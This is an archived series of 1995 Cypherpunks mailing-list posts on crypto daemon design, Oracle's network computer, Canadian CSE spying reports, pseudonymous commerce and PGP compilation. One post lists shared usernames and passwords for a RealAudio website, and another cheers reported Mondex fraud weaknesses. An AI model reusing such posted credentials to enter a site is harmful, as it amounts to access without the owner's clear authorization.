> Its an interesting proposal, but let me ask you this--Why is
> it better than a libpgp (or pgp.dll) that offers a variety of services
> to programs at multiple levels (ie, offers full one call RSA/IDEA
> encryption and compression, as well as ascii armoring, or offers each
> of those as a seperate function.

   Exportability. There is a general feeling that a mailer program
with specific hooks to libpgp is going to have trouble with
exportablity (and forget about binaries), where a program that
supports a generic interface (the likes of .mailcap) is out of the
NSA's jurisdiction. Of course, this is speculation until we actually
get a ruling, but it sounds plausible enough to me to warrant spending
some time on design and implementation.

   Your question brings up another point: if the daemon process is
going to run as the personal slave of the application, then why not a
dynamic library instead? Two reasons. First, on Unix anyway,
interprocess communication through domain sockets is a more mature,
robust, and portable technology than dynamically linked libraries. On
Windows, it's probably the other way around, and that's worth thinking
about.
   The real reason is, though, that the daemon and application should
naturally be distrustful of each other's address spaces. Can you see
Netscape shipping code that links in a Joe Random dll? Conversely, do
you want your PGP secret data structures sharing an address space with
one of Netscape's beta releases? Using two processes in two address
spaces solves this problem.

   Jeff, if you're reading this, what do you think Netscape's chances
are for supporting such a protocol, assuming of course that there were
nicely implemented daemons, and that the protocol itself was going to
standards track? Is it something you'd be interested in?

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 19 Nov 1995 00:54:16 +0800
To: cypherpunks@toad.com
Subject: Oracle's "internet terminal"
Message-ID: <TRRReD29w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


The recent issue of _Computer Reseller News_ has a couple of items on the
"internet terminal" being readied by Oracle. I'll quote a couple of
crypto-relevant excerpts:

1. Interview with Larry Ellison (Oracle Corp's Chairman/CEO)

Q. How far along are you in the development of the $500 Internet Network
Terminal?

A. We'll be delivering the prototype machines this year with full production in
the third quarter next year.

...

Q. Will you release Application Programing Interfaces for the Oracle browser
and server?

A. We will use industry-standard APIs that are accepted by everybody, not
Microsoft-proposed APIs.

...

Q. What differentiates the Oracle Web products from competitive offerings in
terms of pricing and technology?

A. There will be standard Web payment schemes. We'll use them, as will
everybody else. We won't differentiate ourselves on basic payment schemes. The
thing that will differentiate us is security protocols, the ability to use text
processing, database processing, video processing, our video server technology
and our powerful client.


2. Ellison's field of dreams - $500 PC (by Ken Yamada)

... Oracle's chairman and chief executive, Lawrence Ellison, previewing his
latest futuristic vision at a trade show last month in Geneva, said Oracle is
developing the computer and that it will be shown early next year. The desktop
version of the new system, called a "network computer" and referred to as an
"NC" rather than a PC, is expected to sell for about $500 and will use Internet
servers to do the bulk of its computing. Basic hardware will include an
inexpensive microprocessor, a small amount of memory, a monitor and a keyboard,
but the device will lack storage and software. [I guess, they mean no permanent
storage or software other than the browser in ROM. No remembered state, no
viruses... -DV]

... The Redwood Shores, Calif., company is developing the computer's operating
system and technical design, but the unit will be produces by hardware
manufacturers, said Farzad Dibachi, an Oracle senior vice president. While
Dibachi would not name specific manufacturers, he explained that Oracle's
participation in the device's technical development was similar to the role it
played in developing a digital television set-top box with Apple Computer,
which produced the box's hardware. ... Oracle plans to sell software that turns
World Wide Web sites essentially into central processing units for the new
computers. ...

"If computing is to go to the masses and we're doing electronic commerce," said
Dibachi in a telephone interview from Geneva, "you have to have devices that
are simpler."

Oracle's Laursen said he expectes that eventually many different companies will
manufacture the devices, which he described as an entire line of products
encompassing two-way pagers, intelligent telephones, mobile computers, desktop
systems and television set-top boxes. Each of these devices would rely on the
Internet to do its core processing work. He said he expected Oracle to develop
as many as 50 working prototypes by early next year.

... Oracle also plans to leverage its wireless communications software products
and give some of the devices wireless capabilities. "We're still trying to
figure out what processor to put in," Laursen said. Under consideration are
chips from Mips Technologies and Motorola Inc.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 19 Nov 1995 03:25:15 +0800
To: cypherpunks@toad.com
Subject: Re: ZD Net Update v.1 #2
Message-ID: <acd36fae03021004cda7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:11 PM 11/18/95, ZD Net / World Wide Web Edition wrote:
>__________________________________ZD Net Update_______________________________
>v. 1 #2                                                               11-13-95
>
>Welcome to ZD Net Update, the free E-mail newsletter created especially for
>registered users of Ziff-Davis Interactive's ZD Net/World Wide Web edition.
>ZD Net Update is a bi-weekly bulletin that alerts you to new and exciting
>developments on ZD Net.


(rest of long newsletter deleted....)

Ah, someone has once again subscribed the Cypherpunks list to a newsletter.

Will the person who did this please have the decency to reverse this
situation? (There are instructions at the end, but the syntax of the
"unsubscribe" command may imply that only the site from which the subscribe
was initiated can unsub. Whomoever subscribed us can unsub us.)

Do I have to point out that just a single one of these long newsletters
takes up more list bandwidth the most of the putatively "off-topic" posts
do?

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Sun, 19 Nov 1995 03:43:15 +0800
To: cypherpunks@toad.com
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <Pine.BSD.3.91.951118163828.463A-100000@usr3.primenet.com>
Message-ID: <199511181926.LAA26947@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


atilla brings up many good points, including:
> one of the biggest problems with _any_ crypto system, and pgp is 
> no exception, is tmp files, followed closely by insecure memory.
> insecure memory is a separate issue, but some of the temporary file
> problems can be relegated to reduced risk by passing the daemon the
> user's preferred location for tmp file --for instance, [...]

   An even better solution is to design the cryptosystem so that it
doesn't _need_ temp files int he first place. MOSS wins, PGP loses. I
don't know enough about S/MIME to say.

   In a related vein, Darren New <dnew@sgf.fv.com> sent me a pointer
to First Virtual's SMXP (Simple Mime eXchange Protocol). This is a
cool protocol that does about 50% of what I'm talking about. If you're
interested, here it is:
      ftp://ftp.fv.com/pub/docs/smxp-spec.{ps,txt}

   In order to adapt SMXP into something that's useful for what I've
proposed, numerous changes would need to be made:

* Unix Domain Sockets instead of TCP

* Add negotiation

* Add authentication

   Without these three changes, the system is nearly useless for
crypto. Further, there are two "aesthetic" points I'd like to see
claned up given the chance. First, SMXP makes the "ASCII assumption."
Since the daemon and app will be tightly coupled, definitely running
on the same machine, there is no reason to exclude binary MIME
objects. On the other hand, as far as I know, all of the MIME crypto
protocols are ASCII based (somebody please correct me if S/MIME is the
exception).
   Second, in order to support operation without temp files, it's
necessary to interleave the operations of transferring the object from
the app to the daemon and vice versa. I have a proposal for a
lower-level spec which can handle this quite readily, if anyone is
interested.

   Unfortunately, the proposal doesn't look much like SMXP. However,
the possibility of creating a prototype based on SMXP is intriguing.

Raph

P.S. Did anyone see the mention of the perl/RSA CJR in the latest
Wired? Managed to get the attribution wrong. Still no response.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wiltship@iccu6.ipswich.gil.com.au (PeterWiltshire)
Date: Sat, 18 Nov 1995 10:11:54 +0800
To: cypherpunks@toad.com
Subject: Re: credit card conventional wisdom
Message-ID: <199511180157.MAA13155@iccu6.ipswich.gil.com.au>
MIME-Version: 1.0
Content-Type: text/plain


You wrote...
>While not as familiar with the US system as the Canadian, I can give as a
>simple example, the bank clearing system for paper checks.  In Canada, we
>can clear a check from one side of the country to the other overnight.  We
>have 24 hour clearing.  While this is far from "perfect", our existing
>paper systems allow for a degree of efficiency which I don't believe is
>engineered into the US clearing system. 

Here in Australia most banks take 5 working days to clear a cheque.. even if
it's deposited at a bank just up the road from drawer's bank.

cheers

Peter







                                             Flight to Quality
                                 Wiltshire Productions Pty Ltd
                              Brisbane, Queensland, Australia
               Intl Voice  61 7 3376 3535  Intl Fax  61 7 3279 4027
              Email wiltship@gil.com.au  PGP Key ID 3E584C7D
  PGP Fingerprint 01 03 FB F4 BE F8 2B F3 5D 84 6B 69 37 80 FE 10





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sun, 19 Nov 1995 04:30:18 +0800
To: cypherpunks@toad.com
Subject: Re: Request for URL'S
Message-ID: <acd3e86c040210041c67@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 7:31 PM 11/6/95, Censored Girls Anonymous wrote:
....
>I'd love to make a Cypherpunk URL page,
>so if you will send your five favorite URL's
>I'll put them all on a page like The Dreams Page,
>(http:www.primenet.com/~carolab/dreams.html)
>and turn it loose on the net.

The following seems to be a pretty good nexus:
http://www.quadralay.com/www/Crypt/Crypt.html

There is, of course
http://www.oberlin.edu/~brchkind/cyphernomicon/

A crypto legal centre:
http://www.kub.nl:2080/FRW/CRI/projects/bjk/lawsurvy.htm

Happy Hunting






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wwwziff@internet.com (ZD Net / World Wide Web Edition)
Date: Sun, 19 Nov 1995 02:17:22 +0800
To: wwwedition@ziff.com
Subject: ZD Net Update v.1 #2
Message-ID: <199511181755.MAA22495@yipee.internet.com>
MIME-Version: 1.0
Content-Type: text/plain


__________________________________ZD Net Update_______________________________
v. 1 #2                                                               11-13-95

Welcome to ZD Net Update, the free E-mail newsletter created especially for
registered users of Ziff-Davis Interactive's ZD Net/World Wide Web edition. 
ZD Net Update is a bi-weekly bulletin that alerts you to new and exciting
developments on ZD Net.

In this issue:

> ZD NET COMDEX/FALL '95 COVERAGE KICKS OFF
> ZIFF-DAVIS PREMIERES ZD INTERNET LIFE ON THE WORLD WIDE WEB
> TRUE INTERACTIVE REALITY ARRIVES ON ZD NET
> ANNOUNCING SNAP SOLUTIONS TO COMPLEX PROBLEMS
> MEASURE THE HEALTH OF THE NET WITH THE INTERNET INDEX

*     *     *     *     *     *     *     *     *     *

ZD NET COMDEX/FALL '95 COVERAGE KICKS OFF

Comdex/Fall: It's been called the Greatest Show on Earth, and for good reason.
All this week the ZD Net Special Report

      http://www.zdnet.com/~zdi/comdex/filters/main.html

will provide continuous updates from the trade show, complete with daily news
updates, expert commentary, and Live Chats. Follow PC Magazine's Technical
Excellence Awards, cybercast as a virtual 3D world. Get the skinny from PC 
Week's
Spencer F. Katt party. And learn all about the new products that have attendees
buzzing. For all the sights and sounds of the show, ZD Net is the place to be.


*     *     *     *     *     *     *     *     *     *

ZIFF-DAVIS PREMIERES ZD INTERNET LIFE ON THE WORLD WIDE WEB

This month marks the debut of ZD Internet Life (http://www.zdnet.com/zdil/), 
the first interactive magazine designed from the ground up around a Web site. 

Combining a magazine, a Web site, and a CD ROM, ZD Internet Life is focused
on using the Internet for fun, profit, and personal growth. The editorial
staff is headed by Bill Machrone, ZD Internet Life's Editor-in-Chief,
Ziff-Davis's Vice President of Technology, and one of computer journalism's
most respected stars. It also includes Web doyenne Angela Gunn and Associate
Editor Lisa Holzer.

Together with expert reviewers, ZD Internet Life's staff picks "The Best"
sites and provides a top-to-bottom listing of "The Rest" of the sites that
address a given topic under the categories of fun, profit, and personal
growth. Readers who visit the Web sites will be able to add their opinions
to an online database of site reviews. 

The content of the Web site is a superset of what will appear in the magazine
and on the CD ROM. In the words of the ZD Internet Life editors, "ZD Internet
Life is a Web site with an accompanying magazine. In other words, what you see
right here is a lot like what you'll see on your local  newsstand three months
from now. Make sense? Welcome to the future of publishing."

*     *     *     *     *     *     *     *     *     *

TRUE INTERACTIVE REALITY ARRIVES ON ZD NET

Blast off into the future with ZD3D (http://www.zdnet.com/~zdi/vrml),
a new interactive virtual reality area on ZD Net. Designed to serve as the 
preeminent source for interactive virtual reality on the Internet, ZD3D 
provides users with a rich and evolving virtual reality site, direct access
to other 3D Web sites, and a wealth of news, events, articles, and commentaries
focusing on virtual reality.  

ZD3D's design is based on Virtual Reality Modeling Language (VRML), a technology
standard created by Tony Parisi and Mark Pesce that makes 3D environments on the
Internet accessible through a standard PC. Users will feel as if they're 
actually
strolling around 3D Web sites at will, obtaining information in the form of 
graphical,
three-dimensional metaphors. In building the area, ZDI obtained the support of
both Pesce and Parisi, who will contribute exclusive VRML commentaries and 
updates 
to ZD3D. In addition, Parisi helped ZDI build the ZD3D site through Intervista 
Software, his VRML technology and consulting firm.  

When ZD Net users click on ZD3D, they're given several options, including hot
news; Parisi and Pesce's commentaries; the WorldView VRML browser from 
Intervista
Software and other VRML browsers; and Terminal Reality, ZD3D's interactive 
virtual reality experience. The WorldView browser can be downloaded for free,
enabling users to access the Terminal Reality world and launch to the other 
3D Web sites available there.  

Once in, users navigate through a virtual airport, complete with departure 
gates to other interactive 3D Web sites, a central newsstand, and 
advertisements on walls and vehicles. Users are transported to 3D sites via a 
wide range of vehicles, including rockets, jets, ships, buses, and trains. Over 
the next six to nine months, ZD3D will include 3D chat, animated objects, and 
3D sound.

Experience the brave new world of virtual reality on the Web. Experience ZD3D 
today!

*     *     *     *     *     *     *     *     *     *

ANNOUNCING SNAP SOLUTIONS TO COMPLEX PROBLEMS

Just don't have enough time to design your own home page? Relax, help is on the 
way.  

The ZD Net How To Design Your Own Home Page SnapSolution 

     http://www.zdnet.com/~zdi/software/snapsol/snapmain.html

provides all the knowledge you need to stake a claim on the World Wide Web and 
to
put up your own site for the whole world to see. This informative, entertaining
guide offers a step-by-step tutorial, using programs chosen from the thousands 
of files in ZD Net's shareware libraries as well as colorful screen shots 
illustrating
the key points. 

SnapSolutions offer hands-on, step-by-step advice on how to make your life more
productive using shareware. Appearing each month, SnapSolutions will focus on 
both
computing and non-computing goals alike. The next two SnapSolutions will help 
you create 
our own screen saver and holiday greeting cards.

SnapSolutions: shareware at its best.

*     *     *     *     *     *     *     *     *     *

MEASURE THE HEALTH OF THE NET WITH THE INTERNET INDEX

Got an extra couple of grand burning a hole in your pocket? Maybe it's time you 
invested in the Internet.

Introducing the Inter@ctive Week Internet Index, or @Net Index,

     http://www.hydra.com/interactive_week.html

a collection of 37 Internet-related companies that give investors a formal 
measure
of the performance of the emerging Internet industry. 

The @Net Index, which trades under the symbol IIX, was developed by Inter@ctive
Week and the American Stock Exchange to better measure the performance of 
businesses
associated with the Internet. It does this by focusing on select Internet
service providers, commercial online service companies, Internet tool companies,
multimedia publishers, and networking companies. The @Net Index also includes
providers of technology expected to shape the future of the Internet, such as 
videoconferencing and interactive television.

The @Net Index is a bona fide investment vehicle; options contracts on it will
trade every business day on the floor of the American Stock Exchange. Investors 
will
trade options based on the direction the index takes, over time. Initial 
expiration
months are November and December 1995; January, April, and July 1996. 

The @Net Index closed Oct. 17 at 215.04, up 52 percent since the beginning of 
1995.
The Standard & Poor's 500 was up 28 percent for the same period. 

For more information about investing in the Index, call (800) THE-AMEX or check
out the AMEX's Web site at http://www.amex.com. The Inter@ctive Week Web site 
(http://www.zdnet.com/~intweek) provides trading updates.

*     *     *     *     *     *     *     *     *     *

ZD Net Update is the official newsletter of ZD Net/World Wide Web Edition. It 
is 
compiled by Tom Schmidt (tom_schmidt@zd.com). Feel free to respond with any 
news,
notes, comments, or suggestions. To unsubscribe to ZD Net Update, point your 
browser
to:

     http://www.zdnet.com/cgi-bin/ziffmail.pl/update

and select 

     "Unsubscribe to ZD Net Update."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Sun, 19 Nov 1995 03:36:01 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <199511181441.JAA02040@homeport.org>
Message-ID: <Pine.SUN.3.90.951118131853.27991A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 18 Nov 1995, Adam Shostack wrote:

> 	A daemon per user, or per machine?  Either way, I think you
> run into problems on a big multi-user machine.  (Either its an extra
> process or two per person, or its a great target for attack &
> subversion.

	Not any more are target for attack than a shared library.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Johnson@Colorado.EDU (Richard Johnson)
Date: Sun, 19 Nov 1995 05:11:35 +0800
To: cypherpunks@toad.com
Subject: Re: RealAudio website TEMPORARY PASSWORD
Message-ID: <v02130504acd3f2635e65@[204.144.184.50]>
MIME-Version: 1.0
Content-Type: text/plain


>
>          Username: cpunks
>TEMPORARY Password: New.Norfolk
>
I assume that temp password will be changed to cypherpunks soon.

Note that

          Username: cypherpu   [8 char limit]
          Password: cypherpunks

also works.  Someone set it up a few months ago.

Richard






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdavidm@iconz.co.nz (David Murray)
Date: Sun, 19 Nov 1995 10:01:26 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymity and Intellectual Capital
In-Reply-To: <199511160148.RAA18908@jobe.shell.portal.com>
Message-ID: <pnr598536982o@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To pick up on a couple of Professor Post's ideas - limited liability of
untraceable pseudonyms, and choice of rule sets in cyberspace (see Post,
"Anarchy, State, and the Internet: An Essay on Law-Making in Cyberspace"
1995 J Online Law art 3), I suggest that arbitration is well suited to
pseudonymous commerce, and  propose the use of an old device - the 
unincorporated, or deed of settlement, company.

Contract seems likely to be the basic building block of pseudonymous digital
commerce for the forseeable future (barring a mathematical solution to the
non-repudiation problem). But, of course, contracts have to be enforced in
courts, which opens the whole thing to state intervention a la the unenforce-
ability of gambling contracts etc, and, generally requires the nym to front
up with some form of True Name to launch or defend proceedings...

On the other hand, ADR is hot, and arbitration has long been encouraged as a
method of settling commercial disputes without troubling the courts. It seems
to be getting easier to enforce arbitral awards and harder to appeal them, or
to bypass the arbitration in the first place.

And it is becoming easier to specify your own arbitration procedures (for
instance, those suited to pseudonymous parties presenting argument and evidence
untraceably via the net) and even to specify the substantive law of the 
arbitration, which need not be the law of any state (eg the UNCITRAL contract
law, or even "those laws accepted in international commerce").

So it would be possible for arbitral tribunals specially adapted to
pseudonymous digital commerce to somewhat shield transactions from the
procedural and substantive laws of any state that makes enforcement of those
transactions problematic.

Now, as Prof Post points out, the limited liability corporation is an efficient
device for the pooling of capital and the taking of business risks. But the
grant of incorporation is by the State, and the State usually requires certain
information - such as the name and address of the stockholders - as a
condition of that grant.

The last time State granted incorporations were in short supply, the merchants
of Britain developed (or redeveloped) the deed-of-settlement company -
essentially a partnership with a Board of managing partners, the assets of the
partnership vested in trustees, and the shares in the partnership easily
transferrable.

There were two major drawbacks to the deed of settlement company (which didn't
stop them being very popular, or their shares being widely traded):

1. Under the procedural laws of the day it was very difficult to sue or be
sued, because all of the partners (ie shareholders) at the time the cause of
action arose had to be named in the action. This was ameliorated by the use
of arbitration, and, occasionally, courts allowed the trustees to sue for
the company.

2. Lack of limited liability - a partner is personally liable for all the debts
of the partnership. This was ameliorated by providing in contracts entered
into by the company that recourse could only be had to partnersip assets - and,
of course, by the difficulty of suing such companies.

Both these can, at least partially, be overcome in psuedonymous digital
commerce - the first by the use of arbitration, and by more flexible modern
procedural rules (although, depending on the jurisdiction, this may not be a
complete answer); the second by the inherent limited liability of an
untraceable digital pseudonym.

Now, with a corporation in a tax haven jurisdiction acting as trustee (to
more than one company, potentially), someone/something acting as a registry
(attending to the transfer of shares in the company, and potentially many
other companies), an account at Mark Twain (held by the trustee company), and
an appropriate deed of settlement (or partnership agreement)  - oh, and some
object for the company - and now you've got something to do with your digicash!

;-)

As an historical aside, the reason unincorporated companies died out in Britain
was that they were outlawed when the general incorporation acts were
introduced - or, rather, existing companies were encouraged to incorporate
(where their deeds became their articles of association, and the objects of
the trust became the memorandum of association) and new ones were outlawed as
oversize (somewhere between 10 and 25, at various times) partnerships. In
England and Australia, at least, the prohibition on outsize partnerships still
continues, and special exceptions have to be made for Chartered Accountants,
Solicitors and architects.

Unincorporated companies were not so popular in the US (although Alexander
Hamilton (?) originally organized the Bank of New York as one) because, after
the revolution, general incorporation statutes were quick to be passed. (Which,
incidentally, is why the Commonwealth has companies and shares and articles,
and the US has corporations and constitutions and stocks. [Canada is the
exception that proves the influence of geography over history.]) On the other
hand, the Massechusetts (?) Business Trust can be seen as the ultimate devel-
opment of the concept (or, at least, that's what I read somewhere).

Dm.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMK0wFllo3j8JHzalAQFlZQQAnHmFwb4i+vbDRZDnZzn3himkhK8WXXRg
o5cKLOCA0I/7k1NZJrwvMKP8CxV6GxZIyNOTNvXnjKffzcDg5HP2uRHRZTQLVg0H
6zPVMORBdWFKs7LTK40CBViJlQAEGTUdYSAdqgKy0+KlBvs6fyGS8va/3gs2voYv
7qqt1NleQhU=
=l9ff
-----END PGP SIGNATURE-----

[Palmtop News Reader - Beta Version 3]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 19 Nov 1995 07:37:02 +0800
To: cypherpunks@toad.com
Subject: Re: CANADIAN PRESS REPORTS (was Re: CSE gets flak on TV)
Message-ID: <199511182325.PAA04123@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 18 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> >Taking three successive news stories from three days ... (press stories,
> >I've since pulled for my own reference) and pasting them together to
> >indicate some type of Machiaevellian?? (sp) exercise is simply "not done." 
> 
> I still feel such a sense of violation with what LD did, such an utter
> sense of helplessness at the character assassination I've suffered at his
> hands, that I feel that I must take some token action to "set the
> record straight".  Something which clears my name.
> 
> Here is the TRUE unedited story for the list which Deitweiler felt he
> had to TWIST to the nth degree.  His attempt at making mountains out
> of mole hills will not succeed with this one.

This story truly is a non-starter.  Big deal.  It really has no
relevance to this international list.  This is simply a Canadian matter.

So Canada spied on its allies -- Mexico and South Korea particularly --
and possibly picked up some information which helped Canada to outbid
the United States on a lucrative wheat deal with China.

So what??  As they say ... you snooze you loose.  

Deitweiler's attempt to get American farmers into the picture isn't
going to work.  The part about wheat sales isn't even remotely
relevant to the story.  It's a single paragraph.

CSE has a mandate and follows it.  No one needs to listen to
Deitweiler's rantings and whinings, and his so-called outrage.

As the box at the end of the story shows, Canada simply doesn't
currently have the budget to do a really broad search of the United
States or Mexico.  It just can't pick up every American's phone calls.

The story isn't about that.  It's simply about listening in on a
woman's phone call to her doctor.  His attempt to make more out of
this than what is actually there, and in the process to sully my good
name won't work.

Let the readers judge for themselves, based on the ORIGINAL stories
rather than LD's cut and paste and his personal *commentary*.  And
hopefully no one will judge me, for his words.  

Let the story simply speak for itself.




SPY WORLD
Electronic snooping part of the trade game with friendly countries

Intelligence agencies comb the airwaves for useful data

Jim Bronskill
The Canadian Press
OTTAWA

  Intelligence experts said Monday it's no big secret that Canada's
high-tech spy agency snoops on friendly countries for financial gain.
  Increasingly, intelligence agencies around the world are using their
antennas, computers and codebreakers to gather economic information,
said Wesley Wark, a University of Toronto history professor.
  Some of Canada's largest trading partners -- including the United
States, France and Japan -- comb the airwaves for useful information,
so Canada would be foolish not to join the game, said Wark.
  "I don't know what a friendly power in the economic sphere is,
exactly, these days," he said.  "That seems to be a very ambiguous
term."
  Canada's secretive Communications Security Establishment -- an arm
of the Defence Department -- collects and analyses communications
traffic on the activities of foreign states, corporations and people.
  Jan Shorten, a former CSE employee, told CTV News in an interview
Sunday the agency spied on Canada's allies and trading partners --
including Mexico and South Korea -- by eavesdropping on embassies,
consulates and diplomats.
  In a follow-up segment for broadcast Monday, Shorten said the CSE
frequently intercepted telephone conversations and faxes of Canadians
working at foreign embassies in Canada.
  The government acknowledged earlier this year it uses CSE data to
help develop foreign and defence policies.
  In New Zealand where a meeting of Commonwealth countries just
wrapped up, Prime Minister Jean Chretien did not deny Canada is spying
on allies.
  "This is an organization that works within the law of Canada,"
Chretien told reporters. "They do not report to me on a daily basis
and I cannot make any comments on if they are spying on anybody, I
don't know.
  "But they have a mandate to check a few things around the world.
Probably somebody is listening to us at this moment."
  The prime minister also said that of any laws have been broken,
"somebody will have to pay the price."
  In a book published last year, former CSE employee Mike Frost told
how the agency electronically picked up information that helped Canada
outbid the United States on a lucrative 1982 wheat deal with China.
  Such clandestine behaviour may be unethical, but countries do it,
said U.S. journalist David Kahn, who has written extensively on
intelligence matters.
  "It's just too valuable to give up," said Kahn, a visiting historian
at the National Security Agency, the CSE's much larger U.S. cousin.
  "I wouldn't be surprised if the United States was trying to break
Canadian codes."
  Ottawa maintains that the CSE, the NSA and their counterparts in
Britain, Australia and New Zealand have all agreed not to spy on each
other.
  The government also says the CSE does not target Canadians and
scrupulously abides by Canadian laws.
  Shorten said the CSE stepped up its operations against foreign
embassies in Canada in 1991.  She recalled hearing conversations of
Canadinas employed there -- even one woman's phone call to her doctor.
  An appalled Shorten eventually confronted her boss, who assured her
the practice was legal.
  The agency is obligated to destroy information about Canadians it
scoops up in its electronic net, said Wark.  A rare exception might be
a phone call describing a terrorist plot.

[The story also had a little box with some Quick Facts in it]


                   QUICK FACTS

 EMPLOYEES:  About 900
 
 1995-96 BUDGET: $113 Million

 HQ:   Sir Leonard Tilley Building, 
       behind a three metre fence tipped
       with barbed wire in south Ottawa.

 ROLE: Secretive arm of Defence Department monitors and anlyses
       communications about activities of foreign states, corporations
       and individuals.  Also helps government stop Canadian signals
       from being intercepted.

SHARES: Intelligence with counterparts in United States, Britain,
        Australia, New Zealand.



And that's all she wrote ... 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Sun, 19 Nov 1995 00:09:02 +0800
To: cypherpunks@toad.com
Subject: protecting against impersonation (was: CANADIAN PRESS REPORTS)
Message-ID: <29172.9511181558@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



anonymous writes:
> I still feel such a sense of violation with what LD did, such an
> utter sense of helplessness at the character assassination I've
> suffered at his hands, 

So use PGP, sign your messages.  Simple solution.

> that I feel that I must take some token action to "set the record
> straight".  Something which clears my name.

This post wasn't signed off, but I presume you are "Alice d'nonymous",
it would help lots if you could get yourself an account with a nym
server, such as alpha@c2.org.  That would have the advantages that
your email address would be recognizable, and that people could reply
to you if they wanted to.

If having a working reply address bothers you, well at least sign your
posts, if you're concerned about a persistant identity, the tools are
available to do it.  Complaining about things which have simple
technological solutions won't get you much sympathy.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@cnw.com>
Date: Sun, 19 Nov 1995 08:23:11 +0800
To: "'cypherpunks@toad.com>
Subject: Visual Basic 4.0 encryption prog.
Message-ID: <01BAB5D0.4CBEAEE0@king1-04.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


	I just scored a copy of visual basic 4.0 and I was wondering how feasible it would be to write a program for Window$ 95 that would use RSA or IDEA and the Win95 exchange interface. I plan on buying Applied Cryptography probably on Fri. when I get paid.
	My requirements/goals are: 100% compatibility with M$ Exchange, ease of use (Point & Click/ drag & drop) and last but not least, STRONG public key encryption using "off-the shelf
code. 
	So my ??? Is this: Is it possible? Or should I just go out and buy a C++ compiler.
I don't really care about ITAR or any of that other BS, I just won't put MY name on it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@cnw.com>
Date: Mon, 20 Nov 1995 13:36:29 +0800
To: "'cypherpunks@toad.com>
Subject: RE:
Message-ID: <01BAB6A0.530885C0@king1-12.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain




----------
From:  anonymous-remailer@shell.portal.com[SMTP:anonymous-remailer@shell.portal.com]
Sent:  Friday, November 17, 1995 7:31 PM
To:  cypherpunks@toad.com

Subject:  Shoe-horning Mondex onto the Internet -- still won't fit

>+ According to inside sources, is grossly vulnerable to replay attacks 
>(offline multi-spending to different parties)
>-- Mondex has security holes
>-- Customers who defraud Mondex-using banks have legal deniability in a 
>court of law: they can simply request banks to produce the security 
>protocols as evidence; if they refuse the case is thrown out of 
>court (precedent: UK and US phantom-ATM withdrawal cases)

HEY-sounds GREAT to me, I'm ALL FOR IT!!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sun, 19 Nov 1995 05:31:26 +0800
To: Raph Levien <raph@c2.org>
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <199511181926.LAA26947@infinity.c2.org>
Message-ID: <Pine.3.89.9511181615.A21921-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 18 Nov 1995, Raph Levien wrote:

>    An even better solution is to design the cryptosystem so that it
> doesn't _need_ temp files int he first place. MOSS wins, PGP loses. I
MOSS?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com (James A. Donald)
Date: Sun, 19 Nov 1995 23:17:59 +0800
To: cypherpunks@toad.com
Subject: Recompiling PGP 2.6.2i under microsoft.
Message-ID: <199511191508.HAA19053@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


I am trying to recompile  PGP 2.6.2i under Microsofts VC 1.5.

Unfortunately the makefile pgp.mak is configured for borlands C
compiler and linker, and the makefile pgppwb.mak gives me a bunch of
link time errors.

Is there someone around who has been there and done that.

Is this just a trivial edit or a serious rewrite?

C:\PGP\PGP.SRC\SRC> nmake -f pgppwb.mak

[....]

Libraries [.lib]:
